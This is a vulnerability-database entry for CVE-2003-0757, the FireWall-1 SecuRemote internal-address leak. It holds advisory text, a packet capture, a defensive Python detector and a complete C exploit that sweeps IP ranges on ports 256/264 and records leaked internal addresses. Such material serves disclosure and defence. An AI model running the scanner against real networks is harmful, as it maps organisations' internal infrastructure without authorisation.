CVE-2003-0757
CVSS 5.0
Published: 2003-10-20 00:00:00
Revised: 2008-09-05 16:35:10
NMCOES    

[Original] Check Point FireWall-1 4.0 and 4.1 before SP5 allows remote attackers to obtain the IP addresses of internal interfaces via certain SecuRemote requests to TCP ports 256 or 264, which leaks the IP addresses in a reply packet.


[CNNVD] Check Point Firewall-1 SecuRemote Internal Interface Address Information Disclosure Vulnerability (CNNVD-200310-068)

        
        Check Point FireWall-1 4.0 and 4.1 (before SP5) include SecuRemote, which lets mobile users connect to the internal network over encrypted, authenticated sessions.
        During the unencrypted initialisation phase of communication between SecuRemote and FireWall-1, the packets sent contain all of the firewall's IP addresses, including those of the associated internal interfaces, so an attacker who can sniff the traffic obtains the internal IP address information.
        During IRM's testing, the internal IP addresses of a Check Point FireWall-1 device were disclosed. Connecting by telnet to TCP port 256 of FireWall-1 4.0 and 4.1 and entering the following characters:
        aa
        aa
        causes the firewall's IP addresses to be returned in binary form.
        In addition, when SecuRemote connects to the firewall's TCP port 264, capturing the transfer with a packet sniffer shows IP address information similar to the following:
        15:45:44.029883 192.168.1.1.264 > 10.0.0.1.1038: P 5:21(16) ack 17 win 8744 (DF)
        0x0000 4500 0038 a250 4000 6e06 5b5a ca4d b102 E..8.P@.n.[Z.M..
        0x0010 5102 42c3 0108 040e 1769 fb25 cdc0 8a36 Q.B......i.%...6
        0x0020 5018 2228 fa32 0000 0000 000c c0a8 0101 P."(.2.......M..
        0x0030 c0a8 0a01 c0a8 0e01 ........
        c0a8 0101 = 192.168.1.1
        c0a8 0a01 = 192.168.10.1
        c0a8 0e01 = 192.168.14.1
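The decoding behind the capture above, written from the monitoring side as an added example (it is not part of the IRM advisory, the exploit record, or this database entry): it strips the IPv4 and TCP headers from a captured frame, decodes the address list in the reply, and reports every address other than the one the client connected to, which are exactly the internal interfaces a pre-SP5 gateway should not have revealed. Treating the 4-byte prefix as a big-endian length is an assumption; it matches the capture shown (0000000c equals the 12 bytes of addresses that follow) and the way the exploit later on this page skips the first 4 bytes, but it is not vendor documentation. The sample frame is constructed from the hex dump on this page; note that the IP header in that dump carries addresses different from the ones in the tcpdump summary line, which is why the address the client connected to is passed in rather than read from the header.

```python
"""Detect internal-interface disclosure in FireWall-1 SecuRemote replies.

Added example for CVE-2003-0757; not code from IRM, Jim Becher or Check Point.
Assumption: a reply on TCP 256/264 is a 4-byte big-endian length followed by
4-byte IPv4 addresses (consistent with the capture on the page).
"""
import ipaddress
import struct

# Constructed from the hex dump on this page: the full 56-byte IPv4/TCP frame
# of the 192.168.1.1:264 -> 10.0.0.1:1038 reply, bytes copied as printed.
SAMPLE_FRAME = bytes.fromhex(
    "4500 0038 a250 4000 6e06 5b5a ca4d b102"
    "5102 42c3 0108 040e 1769 fb25 cdc0 8a36"
    "5018 2228 fa32 0000 0000 000c c0a8 0101"
    "c0a8 0a01 c0a8 0e01"
)

# The two ports named in the advisory.
SECUREMOTE_PORTS = {256, 264}


def tcp_payload(frame: bytes) -> tuple:
    """Return (tcp_src_port, payload) for a raw IPv4/TCP frame.

    Honours the IP header length (IHL), the IP total length (so trailing
    link-layer padding is ignored) and the TCP data offset.
    """
    ihl = (frame[0] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[2:4])[0]
    src_port = struct.unpack("!H", frame[ihl:ihl + 2])[0]
    doff = (frame[ihl + 12] >> 4) * 4
    return src_port, frame[ihl + doff:total_len]


def decode_address_list(payload: bytes) -> list:
    """Decode the reply body: assumed 4-byte length, then 4-byte IPv4 addresses.

    Anything that does not fit that shape (empty, truncated, length not a
    multiple of four) yields [] rather than a partial or garbage address.
    """
    if len(payload) < 4:
        return []
    (length,) = struct.unpack("!I", payload[:4])
    body = payload[4:4 + length]
    if length == 0 or length % 4 or len(body) != length:
        return []
    return [str(ipaddress.IPv4Address(body[i:i + 4])) for i in range(0, length, 4)]


def leaked_interfaces(frame: bytes, connected_to: str) -> list:
    """Addresses disclosed by a SecuRemote reply beyond the one the client used.

    connected_to is the gateway address the client actually connected to; every
    other address in the reply is an interface the client had no need to learn.
    """
    src_port, payload = tcp_payload(frame)
    if src_port not in SECUREMOTE_PORTS:
        return []
    return [a for a in decode_address_list(payload) if a != connected_to]


def alert_lines(frame: bytes, connected_to: str) -> list:
    """Human-readable findings, marking RFC 1918 addresses as internal ranges."""
    lines = []
    for addr in leaked_interfaces(frame, connected_to):
        kind = "private range" if ipaddress.ip_address(addr).is_private else "public"
        lines.append(
            f"SecuRemote reply from {connected_to} disclosed interface {addr} ({kind})"
        )
    return lines


if __name__ == "__main__":
    for line in alert_lines(SAMPLE_FRAME, "192.168.1.1"):
        print(line)
```

Running the module prints one finding per leaked interface for the sample frame (192.168.10.1 and 192.168.14.1); the gateway's own 192.168.1.1 is filtered out because the client already knew it.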
        

- CVSS (base score)

CVSS score: 5 [Medium (MEDIUM)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:checkpoint:firewall-1:4.0  Checkpoint Firewall-1 4.0
cpe:/a:checkpoint:firewall-1:4.1  Checkpoint Firewall-1 4.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0757
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0757
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-068
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2003-09/0018.html
(VENDOR_ADVISORY)  BUGTRAQ  20030902 IRM 007: The IP addresses of Check Point Firewall-1 internal interfaces may be enumerated using SecuRemote

- Vulnerability information

Check Point Firewall-1 SecuRemote Internal Interface Address Information Disclosure Vulnerability
Medium severity, Design Error
2003-10-20 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patch:
        Check Point Software
        --------------------
        This issue is reported to be resolved in Check Point version 4.1 Service Pack 5, though this has not been confirmed by the vendor:
        
        http://www.checkpoint.com/techsupport/

- Vulnerability information (23087)

Check Point Firewall-1 4.x SecuRemote Internal Interface Address Information Leakage Vulnerability (EDBID:23087)
hardware dos
2001-07-17 Verified
0 Jim Becher
N/A
source: http://www.securityfocus.com/bid/8524/info

An information leakage issue has been discovered in Check Point Firewall-1. Because of this, an attacker may gain sensitive information about network resources. 

/************************************************************************/
/* The syntax is:                                                       */
/*       fw1_getints (start IP address) (end IP address)                */
/*                                                                      */
/*  Author: Jim Becher -- jim@becher.net                                */
/************************************************************************/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>      /* inet_addr(), inet_ntoa() */
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFSIZE 64

/* Run the SecuRemote exchange on an already connected socket and write the
 * addresses carried in the reply to ints.<ip>. Closes the socket when done. */
void snatch(int sock, char *pass) {
 int i, z, sockfd, result;
 int octet=0;
 char temp1[]="\x30\x00\x00\x03";
 char temp2[]="\x02\x59\x05\x21";
 char temp3[]="\x00\x00\x00\x08";
 char buffer[BUFSIZE]="";
 FILE *out;
 char outfile[32];          /* "ints." + dotted quad + NUL */
 sockfd=sock;

 result=send(sockfd,temp1,4,0);
 sleep(1);    /* Ugly... */

 result=send(sockfd,temp2,4,0);

 result=read(sockfd, buffer, BUFSIZE);

 result=send(sockfd,temp3,4,0);

 /* The reply is a 4-byte header followed by 4-byte IPv4 addresses. */
 result=read(sockfd, buffer, BUFSIZE);

 snprintf(outfile, sizeof(outfile), "ints.%s", pass);
 out = fopen(outfile, "w");
 if (out == NULL) {
   perror(outfile);
   close(sockfd);
   return;
 }
 fprintf(out, "ints:\n");
 i=4;                       /* skip the header */
 while (i+4<=result) {      /* decode only complete 4-byte addresses */
   for (z=1; z<5; z++) {
     octet=(unsigned char)buffer[i];   /* char may be signed */
     fprintf(out, "%d", octet);
     i++;
     if (z != 4) {
       fprintf(out, ".");
     }
   }
   fprintf(out, "\n");
 }
 /* Dump the raw reply too; network data is never used as a format string. */
 if (result > 0) fwrite(buffer, 1, result, out);
 fclose(out);
 close(sockfd);
}

int main(int argc, char *argv[])
{
 int sock;
 struct in_addr addr;
 struct sockaddr_in sin;
 unsigned long start;
 unsigned long end;
 unsigned long counter;
 char *p;
 char trash[16];            /* dotted quad (max 15 chars) + NUL */

 if (argc!=3)
 {
  printf("\nusage : %s start-ip-address  end-ip-address\n\n",argv[0]);
  exit(0);
 }
 
 start=inet_addr(argv[1]);
 end=inet_addr(argv[2]);
 if (start==INADDR_NONE || end==INADDR_NONE) {
  fprintf(stderr, "invalid IP address\n");
  exit(1);
 }
 
 for (counter = ntohl(start); counter <= ntohl(end); counter++)
 {
  int jim=0;

  if ((counter & 0xff) == 255) counter++;   /* skip .255 */
  if ((counter & 0xff) == 0)   counter++;   /* skip .0 */
 
  sin.sin_family=AF_INET;
  sin.sin_port=htons(264);
  sin.sin_addr.s_addr=htonl(counter);
  addr.s_addr=htonl(counter);
  bzero(&(sin.sin_zero), 8);
  fprintf(stdout, "Checking: %s\n", inet_ntoa(addr));
  p=inet_ntoa(addr);
  strcpy(trash, p);
  sock=socket(AF_INET, SOCK_STREAM, 0);
  jim=connect(sock, (struct sockaddr*)&sin, sizeof(sin));
  if (jim==0) {
	fprintf(stdout, "Port 264 open on %s -- Checkpoint Firewall-1 v4.1 or later.\n",inet_ntoa(addr));
	snatch(sock, trash);      /* snatch() closes the socket */
    } 
  else {
	fprintf(stdout, "Can not connect to %s on port 264\n\n", inet_ntoa(addr));
	close(sock);              /* a socket whose connect() failed is not reusable */
	sock=socket(AF_INET, SOCK_STREAM, 0);
	sin.sin_port=htons(256);
	jim=connect(sock, (struct sockaddr*)&sin, sizeof(sin));
	if (jim==0) {
		fprintf(stdout, "Port 256 open on %s -- Checkpoint Firewall-1 4.0 or earlier.\n",inet_ntoa(addr));
		snatch(sock, trash);
	}
	else {
		fprintf(stdout, "Can not connect to %s on port 256\n\n", inet_ntoa(addr));
		close(sock);
	}
    }
 }
 return 0;
}
		

- Vulnerability information

44697
Check Point FireWall-1 SecuRemote TCP Port 256 Malformed Input Internal IP Address Disclosure
Information Disclosure
Loss of Confidentiality

- Vulnerability description

- Timeline

2003-08-22 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Check Point Firewall-1 SecuRemote Internal Interface Address Information Leakage Vulnerability
Design Error 8524
Yes No
2001-07-17 12:00:00 2009-07-11 11:56:00
Discovery credited to Jim Becher.

- Affected program versions

Check Point Software Firewall-1 4.1 SP4
Check Point Software Firewall-1 4.1 SP3
Check Point Software Firewall-1 4.1 SP2
Check Point Software Firewall-1 4.1 SP1
Check Point Software Firewall-1 4.1
Check Point Software Firewall-1 4.0 SP8
Check Point Software Firewall-1 4.0 SP7
Check Point Software Firewall-1 4.0 SP6
Check Point Software Firewall-1 4.0 SP5
Check Point Software Firewall-1 4.0 SP4
Check Point Software Firewall-1 4.0 SP3
Check Point Software Firewall-1 4.0 SP2
Check Point Software Firewall-1 4.0 SP1
Check Point Software Firewall-1 4.0

- Vulnerability discussion

An information leakage issue has been discovered in Check Point Firewall-1. Because of this, an attacker may gain sensitive information about network resources.

- Exploit

Exploit contributed by Jim Becher.

- Solution

It has been reported that this issue is resolved in version 4.1 Service Pack 5. This has not been confirmed by the vendor.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- References

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's websites